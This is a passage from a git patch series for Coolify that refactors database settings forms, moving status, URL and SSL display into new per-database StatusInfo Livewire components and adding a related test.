+        'name' => 'test-redis',
+        'image' => 'redis:7',
+        'redis_password' => 'password',
+        'redis_username' => 'default',
+        'status' => 'exited:unhealthy',
+        'enable_ssl' => true,
+        'is_log_drain_enabled' => false,
+        'environment_id' => $environment->id,
+        'destination_id' => $destination->id,
+        'destination_type' => $destination->getMorphClass(),
+    ]);
+
+    $component = Livewire::test(RedisStatusInfo::class, ['database' => $database])
+        ->assertDontSee('Database should be stopped to change this settings.');
+
+    $database->fill(['status' => 'running:healthy'])->save();
+
+    $component->call('refresh')
+        ->assertSee('Database should be stopped to change this settings.');
+});

From e7e65831a7c0d6b2ac39e98f0ded48afb39317db Mon Sep 17 00:00:00 2001
From: Aditya Tripathi <aditya@climactic.co>
Date: Thu, 21 May 2026 08:31:08 +0000
Subject: [PATCH 17/90] fix(livewire): preserve wire:dirty across DB status
 broadcasts

The earlier refreshStatus fix kept user-typed values intact but Livewire still
absorbed deferred wire:model values into the snapshot on every broadcast-
triggered roundtrip, clearing the unsaved-changes indicator and making the form
look auto-saved. Move all status-derived display (DB URLs, SSL toggle/mode,
cert expiry) out of each DB General form into a sibling StatusInfo Livewire
component, so the form never roundtrips on broadcasts.

Shared scaffolding lives in App\Traits\HasDatabaseStatusInfo plus an x-database-
status-info Blade component, leaving each per-DB StatusInfo class as a ~20-50
line declaration of label, SSL mode options, and SSL save hooks. Parents
dispatch databaseUpdated from save methods so the sibling refreshes after writes.

Tests cover the architecture (no DB form subscribes to status broadcasts) and
the sibling's refresh-on-status-change behavior.
---
 .../Project/Database/Clickhouse/General.php   |  27 +--
 .../Database/Clickhouse/StatusInfo.php        |  31 ++++
 .../Project/Database/Dragonfly/General.php    | 104 +----------
 .../Project/Database/Dragonfly/StatusInfo.php |  26 +++
 .../Project/Database/Keydb/General.php        | 106 +----------
 .../Project/Database/Keydb/StatusInfo.php     |  26 +++
 .../Project/Database/Mariadb/General.php      | 107 +-----------
 .../Project/Database/Mariadb/StatusInfo.php   |  21 +++
 .../Project/Database/Mongodb/General.php      | 119 +------------
 .../Project/Database/Mongodb/StatusInfo.php   |  51 ++++++
 .../Project/Database/Mysql/General.php        | 119 +------------
 .../Project/Database/Mysql/StatusInfo.php     |  51 ++++++
 .../Project/Database/Postgresql/General.php   | 124 +------------
 .../Database/Postgresql/StatusInfo.php        |  52 ++++++
 .../Project/Database/Redis/StatusInfo.php     | 103 +----------
 app/Traits/HasDatabaseStatusInfo.php          | 164 ++++++++++++++++++
 .../components/database-status-info.blade.php |  94 ++++++++++
 .../database/clickhouse/general.blade.php     |  13 +-
 .../database/dragonfly/general.blade.php      |  54 +-----
 .../project/database/keydb/general.blade.php  |  53 +-----
 .../database/mariadb/general.blade.php        |  52 +-----
 .../database/mongodb/general.blade.php        |  77 +-------
 .../project/database/mysql/general.blade.php  |  74 +-------
 .../database/postgresql/general.blade.php     | 126 +++-----------
 .../database/redis/status-info.blade.php      |  51 ------
 .../project/database/status-info.blade.php    |   6 +
 .../Feature/DatabaseSslStatusRefreshTest.php  |  80 +++------
 27 files changed, 603 insertions(+), 1308 deletions(-)
 create mode 100644 app/Livewire/Project/Database/Clickhouse/StatusInfo.php
 create mode 100644 app/Livewire/Project/Database/Dragonfly/StatusInfo.php
 create mode 100644 app/Livewire/Project/Database/Keydb/StatusInfo.php
 create mode 100644 app/Livewire/Project/Database/Mariadb/StatusInfo.php
 create mode 100644 app/Livewire/Project/Database/Mongodb/StatusInfo.php
 create mode 100644 app/Livewire/Project/Database/Mysql/StatusInfo.php
 create mode 100644 app/Livewire/Project/Database/Postgresql/StatusInfo.php
 create mode 100644 app/Traits/HasDatabaseStatusInfo.php
 create mode 100644 resources/views/components/database-status-info.blade.php
 delete mode 100644 resources/views/livewire/project/database/redis/status-info.blade.php
 create mode 100644 resources/views/livewire/project/database/status-info.blade.php

diff --git a/app/Livewire/Project/Database/Clickhouse/General.php b/app/Livewire/Project/Database/Clickhouse/General.php
index edcb31f5e..b5c0ffff4 100644
--- a/app/Livewire/Project/Database/Clickhouse/General.php
+++ b/app/Livewire/Project/Database/Clickhouse/General.php
@@ -40,34 +40,17 @@ class General extends Component
 
     public ?string $customDockerRunOptions = null;
 
-    public ?string $dbUrl = null;
-
-    public ?string $dbUrlPublic = null;
-
     public bool $isLogDrainEnabled = false;
 
     public function getListeners()
     {
-        $userId = Auth::id();
         $teamId = Auth::user()->currentTeam()->id;
 
         return [
             "echo-private:team.{$teamId},DatabaseProxyStopped" => 'databaseProxyStopped',
-            // Broadcasts go to refreshStatus, which only writes display-only properties.
-            // Never wire status broadcasts to a handler that touches text-input properties —
-            // it clobbers in-progress typing every 10s. See coolify#6062 / #6354 / #9695.
-            "echo-private:user.{$userId},DatabaseStatusChanged" => 'refreshStatus',
-            "echo-private:team.{$teamId},ServiceChecked" => 'refreshStatus',
         ];
     }
 
-    public function refreshStatus(): void
-    {
-        $this->database->refresh();
-        $this->dbUrl = $this->database->internal_db_url;
-        $this->dbUrlPublic = $this->database->external_db_url;
-    }
-
     public function mount()
     {
         try {
@@ -101,8 +84,6 @@ protected function rules(): array
             'publicPort' => 'nullable|integer|min:1|max:65535',
             'publicPortTimeout' => 'nullable|integer|min:1',
             'customDockerRunOptions' => 'nullable|string',
-            'dbUrl' => 'nullable|string',
-            'dbUrlPublic' => 'nullable|string',
             'isLogDrainEnabled' => 'nullable|boolean',
         ];
     }
@@ -142,9 +123,6 @@ public function syncData(bool $toModel = false)
             $this->database->custom_docker_run_options = $this->customDockerRunOptions;
             $this->database->is_log_drain_enabled = $this->isLogDrainEnabled;
             $this->database->save();
-
-            $this->dbUrl = $this->database->internal_db_url;
-            $this->dbUrlPublic = $this->database->external_db_url;
         } else {
             $this->name = $this->database->name;
             $this->description = $this->database->description;
@@ -157,8 +135,6 @@ public function syncData(bool $toModel = false)
             $this->publicPortTimeout = $this->database->public_port_timeout;
             $this->customDockerRunOptions = $this->database->custom_docker_run_options;
             $this->isLogDrainEnabled = $this->database->is_log_drain_enabled;
-            $this->dbUrl = $this->database->internal_db_url;
-            $this->dbUrlPublic = $this->database->external_db_url;
         }
     }
 
@@ -207,6 +183,7 @@ public function instantSave()
                 StopDatabaseProxy::run($this->database);
                 $this->dispatch('success', 'Database is no longer publicly accessible.');
             }
+            $this->dispatch('databaseUpdated');
         } catch (\Throwable $e) {
             $this->isPublic = ! $this->isPublic;
             $this->syncData(true);
@@ -218,6 +195,7 @@ public function instantSave()
     public function databaseProxyStopped()
     {
         $this->syncData();
+        $this->dispatch('databaseUpdated');
     }
 
     public function submit()
@@ -233,6 +211,7 @@ public function submit()
             }
             $this->syncData(true);
             $this->dispatch('success', 'Database updated.');
+            $this->dispatch('databaseUpdated');
         } catch (Exception $e) {
             return handleError($e, $this);
         } finally {
diff --git a/app/Livewire/Project/Database/Clickhouse/StatusInfo.php b/app/Livewire/Project/Database/Clickhouse/StatusInfo.php
new file mode 100644
index 000000000..51a3192fa
--- /dev/null
+++ b/app/Livewire/Project/Database/Clickhouse/StatusInfo.php
@@ -0,0 +1,31 @@
+<?php
+
+namespace App\Livewire\Project\Database\Clickhouse;
+
+use App\Models\StandaloneClickhouse;
+use App\Traits\HasDatabaseStatusInfo;
+use Illuminate\Foundation\Auth\Access\AuthorizesRequests;
+use Livewire\Component;
+
+class StatusInfo extends Component
+{
+    use AuthorizesRequests;
+    use HasDatabaseStatusInfo;
+
+    public StandaloneClickhouse $database;
+
+    protected function databaseLabel(): string
+    {
+        return 'Clickhouse';
+    }
+
+    protected function supportsSsl(): bool
+    {
+        return false;
+    }
+
+    protected function showPublicUrlPlaceholder(): bool
+    {
+        return true;
+    }
+}
diff --git a/app/Livewire/Project/Database/Dragonfly/General.php b/app/Livewire/Project/Database/Dragonfly/General.php
index ae8ec9476..5f57693b1 100644
--- a/app/Livewire/Project/Database/Dragonfly/General.php
+++ b/app/Livewire/Project/Database/Dragonfly/General.php
@@ -4,11 +4,9 @@
 
 use App\Actions\Database\StartDatabaseProxy;
 use App\Actions\Database\StopDatabaseProxy;
-use App\Helpers\SslHelper;
 use App\Models\Server;
 use App\Models\StandaloneDragonfly;
 use App\Support\ValidationPatterns;
-use Carbon\Carbon;
 use Exception;
 use Illuminate\Foundation\Auth\Access\AuthorizesRequests;
 use Illuminate\Support\Facades\Auth;
@@ -40,39 +38,17 @@ class General extends Component
 
     public ?string $customDockerRunOptions = null;
 
-    public ?string $dbUrl = null;
-
-    public ?string $dbUrlPublic = null;
-
     public bool $isLogDrainEnabled = false;
 
-    public ?Carbon $certificateValidUntil = null;
-
-    public bool $enable_ssl = false;
-
     public function getListeners()
     {
-        $userId = Auth::id();
         $teamId = Auth::user()->currentTeam()->id;
 
         return [
             "echo-private:team.{$teamId},DatabaseProxyStopped" => 'databaseProxyStopped',
-            // Broadcasts go to refreshStatus, which only writes display-only properties.
-            // Never wire status broadcasts to a handler that touches text-input properties —
-            // it clobbers in-progress typing every 10s. See coolify#6062 / #6354 / #9695.
-            "echo-private:user.{$userId},DatabaseStatusChanged" => 'refreshStatus',
-            "echo-private:team.{$teamId},ServiceChecked" => 'refreshStatus',
         ];
     }
 
-    public function refreshStatus(): void
-    {
-        $this->database->refresh();
-        $this->dbUrl = $this->database->internal_db_url;
-        $this->dbUrlPublic = $this->database->external_db_url;
-        $this->certificateValidUntil = $this->database->sslCertificates()->first()?->valid_until;
-    }
-
     public function mount()
     {
         try {
@@ -84,12 +60,6 @@ public function mount()
 
                 return;
             }
-
-            $existingCert = $this->database->sslCertificates()->first();
-
-            if ($existingCert) {
-                $this->certificateValidUntil = $existingCert->valid_until;
-            }
         } catch (\Throwable $e) {
             return handleError($e, $this);
         }
@@ -109,10 +79,7 @@ protected function rules(): array
             'publicPort' => 'nullable|integer|min:1|max:65535',
             'publicPortTimeout' => 'nullable|integer|min:1',
             'customDockerRunOptions' => 'nullable|string',
-            'dbUrl' => 'nullable|string',
-            'dbUrlPublic' => 'nullable|string',
             'isLogDrainEnabled' => 'nullable|boolean',
-            'enable_ssl' => 'nullable|boolean',
         ];
     }
 
@@ -148,11 +115,7 @@ public function syncData(bool $toModel = false)
             $this->database->public_port_timeout = $this->publicPortTimeout ?: null;
             $this->database->custom_docker_run_options = $this->customDockerRunOptions;
             $this->database->is_log_drain_enabled = $this->isLogDrainEnabled;
-            $this->database->enable_ssl = $this->enable_ssl;
             $this->database->save();
-
-            $this->dbUrl = $this->database->internal_db_url;
-            $this->dbUrlPublic = $this->database->external_db_url;
         } else {
             $this->name = $this->database->name;
             $this->description = $this->database->description;
@@ -164,9 +127,6 @@ public function syncData(bool $toModel = false)
             $this->publicPortTimeout = $this->database->public_port_timeout;
             $this->customDockerRunOptions = $this->database->custom_docker_run_options;
             $this->isLogDrainEnabled = $this->database->is_log_drain_enabled;
-            $this->enable_ssl = $this->database->enable_ssl;
-            $this->dbUrl = $this->database->internal_db_url;
-            $this->dbUrlPublic = $this->database->external_db_url;
         }
     }
 
@@ -215,6 +175,7 @@ public function instantSave()
                 StopDatabaseProxy::run($this->database);
                 $this->dispatch('success', 'Database is no longer publicly accessible.');
             }
+            $this->dispatch('databaseUpdated');
         } catch (\Throwable $e) {
             $this->isPublic = ! $this->isPublic;
             $this->syncData(true);
@@ -226,6 +187,7 @@ public function instantSave()
     public function databaseProxyStopped()
     {
         $this->syncData();
+        $this->dispatch('databaseUpdated');
     }
 
     public function submit()
@@ -241,6 +203,7 @@ public function submit()
             }
             $this->syncData(true);
             $this->dispatch('success', 'Database updated.');
+            $this->dispatch('databaseUpdated');
         } catch (Exception $e) {
             return handleError($e, $this);
         } finally {
@@ -252,67 +215,6 @@ public function submit()
         }
     }
 
-    public function instantSaveSSL()
-    {
-        try {
-            $this->authorize('update', $this->database);
-
-            $this->syncData(true);
-            $this->dispatch('success', 'SSL configuration updated.');
-        } catch (Exception $e) {
-            return handleError($e, $this);
-        }
-    }
-
-    public function regenerateSslCertificate()
-    {
-        try {
-            $this->authorize('update', $this->database);
-
-            $existingCert = $this->database->sslCertificates()->first();
-
-            if (! $existingCert) {
-                $this->dispatch('error', 'No existing SSL certificate found for this database.');
-
-                return;
-            }
-
-            $server = $this->database->destination->server;
-
-            $caCert = $server->sslCertificates()
-                ->where('is_ca_certificate', true)
-                ->first();
-
-            if (! $caCert) {
-                $server->generateCaCertificate();
-                $caCert = $server->sslCertificates()->where('is_ca_certificate', true)->first();
-            }
-
-            if (! $caCert) {
-                $this->dispatch('error', 'No CA certificate found for this database. Please generate a CA certificate for this server in the server/advanced page.');
-
-                return;
-            }
-
-            SslHelper::generateSslCertificate(
-                commonName: $existingCert->common_name,
-                subjectAlternativeNames: $existingCert->subject_alternative_names ?? [],
-                resourceType: $existingCert->resource_type,
-                resourceId: $existingCert->resource_id,
-                serverId: $existingCert->server_id,
-                caCert: $caCert->ssl_certificate,
-                caKey: $caCert->ssl_private_key,
-                configurationDir: $existingCert->configuration_dir,
-                mountPath: $existingCert->mount_path,
-                isPemKeyFileRequired: true,
-            );
-
-            $this->dispatch('success', 'SSL certificates regenerated. Restart database to apply changes.');
-        } catch (Exception $e) {
-            handleError($e, $this);
-        }
-    }
-
     public function refresh(): void
     {
         $this->database->refresh();
diff --git a/app/Livewire/Project/Database/Dragonfly/StatusInfo.php b/app/Livewire/Project/Database/Dragonfly/StatusInfo.php
new file mode 100644
index 000000000..baeb3d09f
--- /dev/null
+++ b/app/Livewire/Project/Database/Dragonfly/StatusInfo.php
@@ -0,0 +1,26 @@
+<?php
+
+namespace App\Livewire\Project\Database\Dragonfly;
+
+use App\Models\StandaloneDragonfly;
+use App\Traits\HasDatabaseStatusInfo;
+use Illuminate\Foundation\Auth\Access\AuthorizesRequests;
+use Livewire\Component;
+
+class StatusInfo extends Component
+{
+    use AuthorizesRequests;
+    use HasDatabaseStatusInfo;
+
+    public StandaloneDragonfly $database;
+
+    protected function databaseLabel(): string
+    {
+        return 'Dragonfly';
+    }
+
+    protected function showPublicUrlPlaceholder(): bool
+    {
+        return true;
+    }
+}
diff --git a/app/Livewire/Project/Database/Keydb/General.php b/app/Livewire/Project/Database/Keydb/General.php
index 0511c9d04..1c5c828a3 100644
--- a/app/Livewire/Project/Database/Keydb/General.php
+++ b/app/Livewire/Project/Database/Keydb/General.php
@@ -4,11 +4,9 @@
 
 use App\Actions\Database\StartDatabaseProxy;
 use App\Actions\Database\StopDatabaseProxy;
-use App\Helpers\SslHelper;
 use App\Models\Server;
 use App\Models\StandaloneKeydb;
 use App\Support\ValidationPatterns;
-use Carbon\Carbon;
 use Exception;
 use Illuminate\Foundation\Auth\Access\AuthorizesRequests;
 use Illuminate\Support\Facades\Auth;
@@ -42,39 +40,17 @@ class General extends Component
 
     public ?string $customDockerRunOptions = null;
 
-    public ?string $dbUrl = null;
-
-    public ?string $dbUrlPublic = null;
-
     public bool $isLogDrainEnabled = false;
 
-    public ?Carbon $certificateValidUntil = null;
-
-    public bool $enable_ssl = false;
-
     public function getListeners()
     {
-        $userId = Auth::id();
         $teamId = Auth::user()->currentTeam()->id;
 
         return [
             "echo-private:team.{$teamId},DatabaseProxyStopped" => 'databaseProxyStopped',
-            // Broadcasts go to refreshStatus, which only writes display-only properties.
-            // Never wire status broadcasts to a handler that touches text-input properties —
-            // it clobbers in-progress typing every 10s. See coolify#6062 / #6354 / #9695.
-            "echo-private:user.{$userId},DatabaseStatusChanged" => 'refreshStatus',
-            "echo-private:team.{$teamId},ServiceChecked" => 'refreshStatus',
         ];
     }
 
-    public function refreshStatus(): void
-    {
-        $this->database->refresh();
-        $this->dbUrl = $this->database->internal_db_url;
-        $this->dbUrlPublic = $this->database->external_db_url;
-        $this->certificateValidUntil = $this->database->sslCertificates()->first()?->valid_until;
-    }
-
     public function mount()
     {
         try {
@@ -86,12 +62,6 @@ public function mount()
 
                 return;
             }
-
-            $existingCert = $this->database->sslCertificates()->first();
-
-            if ($existingCert) {
-                $this->certificateValidUntil = $existingCert->valid_until;
-            }
         } catch (\Throwable $e) {
             return handleError($e, $this);
         }
@@ -99,7 +69,7 @@ public function mount()
 
     protected function rules(): array
     {
-        $baseRules = [
+        return [
             'name' => ValidationPatterns::nameRules(),
             'description' => ValidationPatterns::descriptionRules(),
             'keydbConf' => 'nullable|string',
@@ -112,13 +82,8 @@ protected function rules(): array
             'publicPort' => 'nullable|integer|min:1|max:65535',
             'publicPortTimeout' => 'nullable|integer|min:1',
             'customDockerRunOptions' => 'nullable|string',
-            'dbUrl' => 'nullable|string',
-            'dbUrlPublic' => 'nullable|string',
             'isLogDrainEnabled' => 'nullable|boolean',
-            'enable_ssl' => 'boolean',
         ];
-
-        return $baseRules;
     }
 
     protected function messages(): array
@@ -154,11 +119,7 @@ public function syncData(bool $toModel = false)
             $this->database->public_port_timeout = $this->publicPortTimeout ?: null;
             $this->database->custom_docker_run_options = $this->customDockerRunOptions;
             $this->database->is_log_drain_enabled = $this->isLogDrainEnabled;
-            $this->database->enable_ssl = $this->enable_ssl;
             $this->database->save();
-
-            $this->dbUrl = $this->database->internal_db_url;
-            $this->dbUrlPublic = $this->database->external_db_url;
         } else {
             $this->name = $this->database->name;
             $this->description = $this->database->description;
@@ -171,9 +132,6 @@ public function syncData(bool $toModel = false)
             $this->publicPortTimeout = $this->database->public_port_timeout;
             $this->customDockerRunOptions = $this->database->custom_docker_run_options;
             $this->isLogDrainEnabled = $this->database->is_log_drain_enabled;
-            $this->enable_ssl = $this->database->enable_ssl;
-            $this->dbUrl = $this->database->internal_db_url;
-            $this->dbUrlPublic = $this->database->external_db_url;
         }
     }
 
@@ -222,6 +180,7 @@ public function instantSave()
                 StopDatabaseProxy::run($this->database);
                 $this->dispatch('success', 'Database is no longer publicly accessible.');
             }
+            $this->dispatch('databaseUpdated');
         } catch (\Throwable $e) {
             $this->isPublic = ! $this->isPublic;
             $this->syncData(true);
@@ -233,6 +192,7 @@ public function instantSave()
     public function databaseProxyStopped()
     {
         $this->syncData();
+        $this->dispatch('databaseUpdated');
     }
 
     public function submit()
@@ -248,6 +208,7 @@ public function submit()
             }
             $this->syncData(true);
             $this->dispatch('success', 'Database updated.');
+            $this->dispatch('databaseUpdated');
         } catch (Exception $e) {
             return handleError($e, $this);
         } finally {
@@ -259,65 +220,6 @@ public function submit()
         }
     }
 
-    public function instantSaveSSL()
-    {
-        try {
-            $this->authorize('update', $this->database);
-
-            $this->syncData(true);
-            $this->dispatch('success', 'SSL configuration updated.');
-        } catch (Exception $e) {
-            return handleError($e, $this);
-        }
-    }
-
-    public function regenerateSslCertificate()
-    {
-        try {
-            $this->authorize('update', $this->database);
-
-            $existingCert = $this->database->sslCertificates()->first();
-
-            if (! $existingCert) {
-                $this->dispatch('error', 'No existing SSL certificate found for this database.');
-
-                return;
-            }
-
-            $caCert = $this->server->sslCertificates()
-                ->where('is_ca_certificate', true)
-                ->first();
-
-            if (! $caCert) {
-                $this->server->generateCaCertificate();
-                $caCert = $this->server->sslCertificates()->where('is_ca_certificate', true)->first();
-            }
-
-            if (! $caCert) {
-                $this->dispatch('error', 'No CA certificate found for this database. Please generate a CA certificate for this server in the server/advanced page.');
-
-                return;
-            }
-
-            SslHelper::generateSslCertificate(
-                commonName: $existingCert->common_name,
-                subjectAlternativeNames: $existingCert->subject_alternative_names ?? [],
-                resourceType: $existingCert->resource_type,
-                resourceId: $existingCert->resource_id,
-                serverId: $existingCert->server_id,
-                caCert: $caCert->ssl_certificate,
-                caKey: $caCert->ssl_private_key,
-                configurationDir: $existingCert->configuration_dir,
-                mountPath: $existingCert->mount_path,
-                isPemKeyFileRequired: true,
-            );
-
-            $this->dispatch('success', 'SSL certificates regenerated. Restart database to apply changes.');
-        } catch (Exception $e) {
-            handleError($e, $this);
-        }
-    }
-
     public function refresh(): void
     {
         $this->database->refresh();
diff --git a/app/Livewire/Project/Database/Keydb/StatusInfo.php b/app/Livewire/Project/Database/Keydb/StatusInfo.php
new file mode 100644
index 000000000..1e87461cd
--- /dev/null
+++ b/app/Livewire/Project/Database/Keydb/StatusInfo.php
@@ -0,0 +1,26 @@
+<?php
+
+namespace App\Livewire\Project\Database\Keydb;
+
+use App\Models\StandaloneKeydb;
+use App\Traits\HasDatabaseStatusInfo;
+use Illuminate\Foundation\Auth\Access\AuthorizesRequests;
+use Livewire\Component;
+
+class StatusInfo extends Component
+{
+    use AuthorizesRequests;
+    use HasDatabaseStatusInfo;
+
+    public StandaloneKeydb $database;
+
+    protected function databaseLabel(): string
+    {
+        return 'KeyDB';
+    }
+
+    protected function showPublicUrlPlaceholder(): bool
+    {
+        return true;
+    }
+}
diff --git a/app/Livewire/Project/Database/Mariadb/General.php b/app/Livewire/Project/Database/Mariadb/General.php
index edd02eb95..41266f152 100644
--- a/app/Livewire/Project/Database/Mariadb/General.php
+++ b/app/Livewire/Project/Database/Mariadb/General.php
@@ -4,14 +4,11 @@
 
 use App\Actions\Database\StartDatabaseProxy;
 use App\Actions\Database\StopDatabaseProxy;
-use App\Helpers\SslHelper;
 use App\Models\Server;
 use App\Models\StandaloneMariadb;
 use App\Support\ValidationPatterns;
-use Carbon\Carbon;
 use Exception;
 use Illuminate\Foundation\Auth\Access\AuthorizesRequests;
-use Illuminate\Support\Facades\Auth;
 use Livewire\Component;
 
 class General extends Component
@@ -50,36 +47,6 @@ class General extends Component
 
     public ?string $customDockerRunOptions = null;
 
-    public bool $enableSsl = false;
-
-    public ?string $db_url = null;
-
-    public ?string $db_url_public = null;
-
-    public ?Carbon $certificateValidUntil = null;
-
-    public function getListeners()
-    {
-        $userId = Auth::id();
-        $teamId = Auth::user()->currentTeam()->id;
-
-        return [
-            // Broadcasts go to refreshStatus, which only writes display-only properties.
-            // Never wire status broadcasts to a handler that touches text-input properties —
-            // it clobbers in-progress typing every 10s. See coolify#6062 / #6354 / #9695.
-            "echo-private:user.{$userId},DatabaseStatusChanged" => 'refreshStatus',
-            "echo-private:team.{$teamId},ServiceChecked" => 'refreshStatus',
-        ];
-    }
-
-    public function refreshStatus(): void
-    {
-        $this->database->refresh();
-        $this->db_url = $this->database->internal_db_url;
-        $this->db_url_public = $this->database->external_db_url;
-        $this->certificateValidUntil = $this->database->sslCertificates()->first()?->valid_until;
-    }
-
     protected function rules(): array
     {
         return [
@@ -105,7 +72,6 @@ protected function rules(): array
             'publicPortTimeout' => 'nullable|integer|min:1',
             'isLogDrainEnabled' => 'nullable|boolean',
             'customDockerRunOptions' => 'nullable',
-            'enableSsl' => 'boolean',
         ];
     }
 
@@ -144,7 +110,6 @@ protected function messages(): array
         'publicPort' => 'Public Port',
         'publicPortTimeout' => 'Public Port Timeout',
         'customDockerRunOptions' => 'Custom Docker Options',
-        'enableSsl' => 'Enable SSL',
     ];
 
     public function mount()
@@ -158,12 +123,6 @@ public function mount()
 
                 return;
             }
-
-            $existingCert = $this->database->sslCertificates()->first();
-
-            if ($existingCert) {
-                $this->certificateValidUntil = $existingCert->valid_until;
-            }
         } catch (Exception $e) {
             return handleError($e, $this);
         }
@@ -187,11 +146,7 @@ public function syncData(bool $toModel = false)
             $this->database->public_port_timeout = $this->publicPortTimeout ?: null;
             $this->database->is_log_drain_enabled = $this->isLogDrainEnabled;
             $this->database->custom_docker_run_options = $this->customDockerRunOptions;
-            $this->database->enable_ssl = $this->enableSsl;
             $this->database->save();
-
-            $this->db_url = $this->database->internal_db_url;
-            $this->db_url_public = $this->database->external_db_url;
         } else {
             $this->name = $this->database->name;
             $this->description = $this->database->description;
@@ -207,9 +162,6 @@ public function syncData(bool $toModel = false)
             $this->publicPortTimeout = $this->database->public_port_timeout;
             $this->isLogDrainEnabled = $this->database->is_log_drain_enabled;
             $this->customDockerRunOptions = $this->database->custom_docker_run_options;
-            $this->enableSsl = $this->database->enable_ssl;
-            $this->db_url = $this->database->internal_db_url;
-            $this->db_url_public = $this->database->external_db_url;
         }
     }
 
@@ -245,6 +197,7 @@ public function submit()
             }
             $this->syncData(true);
             $this->dispatch('success', 'Database updated.');
+            $this->dispatch('databaseUpdated');
         } catch (Exception $e) {
             return handleError($e, $this);
         } finally {
@@ -281,6 +234,7 @@ public function instantSave()
                 StopDatabaseProxy::run($this->database);
                 $this->dispatch('success', 'Database is no longer publicly accessible.');
             }
+            $this->dispatch('databaseUpdated');
         } catch (\Throwable $e) {
             $this->isPublic = ! $this->isPublic;
             $this->syncData(true);
@@ -289,63 +243,6 @@ public function instantSave()
         }
     }
 
-    public function instantSaveSSL()
-    {
-        try {
-            $this->authorize('update', $this->database);
-
-            $this->syncData(true);
-            $this->dispatch('success', 'SSL configuration updated.');
-        } catch (Exception $e) {
-            return handleError($e, $this);
-        }
-    }
-
-    public function regenerateSslCertificate()
-    {
-        try {
-            $this->authorize('update', $this->database);
-
-            $existingCert = $this->database->sslCertificates()->first();
-
-            if (! $existingCert) {
-                $this->dispatch('error', 'No existing SSL certificate found for this database.');
-
-                return;
-            }
-
-            $caCert = $this->server->sslCertificates()->where('is_ca_certificate', true)->first();
-
-            if (! $caCert) {
-                $this->server->generateCaCertificate();
-                $caCert = $this->server->sslCertificates()->where('is_ca_certificate', true)->first();
-            }
-
-            if (! $caCert) {
-                $this->dispatch('error', 'No CA certificate found for this database. Please generate a CA certificate for this server in the server/advanced page.');
-
-                return;
-            }
-
-            SslHelper::generateSslCertificate(
-                commonName: $existingCert->common_name,
-                subjectAlternativeNames: $existingCert->subject_alternative_names ?? [],
-                resourceType: $existingCert->resource_type,
-                resourceId: $existingCert->resource_id,
-                serverId: $existingCert->server_id,
-                caCert: $caCert->ssl_certificate,
-                caKey: $caCert->ssl_private_key,
-                configurationDir: $existingCert->configuration_dir,
-                mountPath: $existingCert->mount_path,
-                isPemKeyFileRequired: true,
-            );
-
-            $this->dispatch('success', 'SSL certificates have been regenerated. Please restart the database for changes to take effect.');
-        } catch (Exception $e) {
-            return handleError($e, $this);
-        }
-    }
-
     public function refresh(): void
     {
         $this->database->refresh();
diff --git a/app/Livewire/Project/Database/Mariadb/StatusInfo.php b/app/Livewire/Project/Database/Mariadb/StatusInfo.php
new file mode 100644
index 000000000..c6fda37b6
--- /dev/null
+++ b/app/Livewire/Project/Database/Mariadb/StatusInfo.php
@@ -0,0 +1,21 @@
+<?php
+
+namespace App\Livewire\Project\Database\Mariadb;
+
+use App\Models\StandaloneMariadb;
+use App\Traits\HasDatabaseStatusInfo;
+use Illuminate\Foundation\Auth\Access\AuthorizesRequests;
+use Livewire\Component;
+
+class StatusInfo extends Component
+{
+    use AuthorizesRequests;
+    use HasDatabaseStatusInfo;
+
+    public StandaloneMariadb $database;
+
+    protected function databaseLabel(): string
+    {
+        return 'MariaDB';
+    }
+}
diff --git a/app/Livewire/Project/Database/Mongodb/General.php b/app/Livewire/Project/Database/Mongodb/General.php
index 1b5a62d2f..7d8249ec4 100644
--- a/app/Livewire/Project/Database/Mongodb/General.php
+++ b/app/Livewire/Project/Database/Mongodb/General.php
@@ -4,14 +4,11 @@
 
 use App\Actions\Database\StartDatabaseProxy;
 use App\Actions\Database\StopDatabaseProxy;
-use App\Helpers\SslHelper;
 use App\Models\Server;
 use App\Models\StandaloneMongodb;
 use App\Support\ValidationPatterns;
-use Carbon\Carbon;
 use Exception;
 use Illuminate\Foundation\Auth\Access\AuthorizesRequests;
-use Illuminate\Support\Facades\Auth;
 use Livewire\Component;
 
 class General extends Component
@@ -48,38 +45,6 @@ class General extends Component
 
     public ?string $customDockerRunOptions = null;
 
-    public bool $enableSsl = false;
-
-    public ?string $sslMode = null;
-
-    public ?string $db_url = null;
-
-    public ?string $db_url_public = null;
-
-    public ?Carbon $certificateValidUntil = null;
-
-    public function getListeners()
-    {
-        $userId = Auth::id();
-        $teamId = Auth::user()->currentTeam()->id;
-
-        return [
-            // Broadcasts go to refreshStatus, which only writes display-only properties.
-            // Never wire status broadcasts to a handler that touches text-input properties —
-            // it clobbers in-progress typing every 10s. See coolify#6062 / #6354 / #9695.
-            "echo-private:user.{$userId},DatabaseStatusChanged" => 'refreshStatus',
-            "echo-private:team.{$teamId},ServiceChecked" => 'refreshStatus',
-        ];
-    }
-
-    public function refreshStatus(): void
-    {
-        $this->database->refresh();
-        $this->db_url = $this->database->internal_db_url;
-        $this->db_url_public = $this->database->external_db_url;
-        $this->certificateValidUntil = $this->database->sslCertificates()->first()?->valid_until;
-    }
-
     protected function rules(): array
     {
         return [
@@ -102,8 +67,6 @@ protected function rules(): array
             'publicPortTimeout' => 'nullable|integer|min:1',
             'isLogDrainEnabled' => 'nullable|boolean',
             'customDockerRunOptions' => 'nullable',
-            'enableSsl' => 'boolean',
-            'sslMode' => 'nullable|string|in:allow,prefer,require,verify-full',
         ];
     }
 
@@ -123,7 +86,6 @@ protected function messages(): array
                 'publicPort.max' => 'The Public Port must not exceed 65535.',
                 'publicPortTimeout.integer' => 'The Public Port Timeout must be an integer.',
                 'publicPortTimeout.min' => 'The Public Port Timeout must be at least 1.',
-                'sslMode.in' => 'The SSL Mode must be one of: allow, prefer, require, verify-full.',
             ]
         );
     }
@@ -141,8 +103,6 @@ protected function messages(): array
         'publicPort' => 'Public Port',
         'publicPortTimeout' => 'Public Port Timeout',
         'customDockerRunOptions' => 'Custom Docker Run Options',
-        'enableSsl' => 'Enable SSL',
-        'sslMode' => 'SSL Mode',
     ];
 
     public function mount()
@@ -156,12 +116,6 @@ public function mount()
 
                 return;
             }
-
-            $existingCert = $this->database->sslCertificates()->first();
-
-            if ($existingCert) {
-                $this->certificateValidUntil = $existingCert->valid_until;
-            }
         } catch (Exception $e) {
             return handleError($e, $this);
         }
@@ -184,12 +138,7 @@ public function syncData(bool $toModel = false)
             $this->database->public_port_timeout = $this->publicPortTimeout ?: null;
             $this->database->is_log_drain_enabled = $this->isLogDrainEnabled;
             $this->database->custom_docker_run_options = $this->customDockerRunOptions;
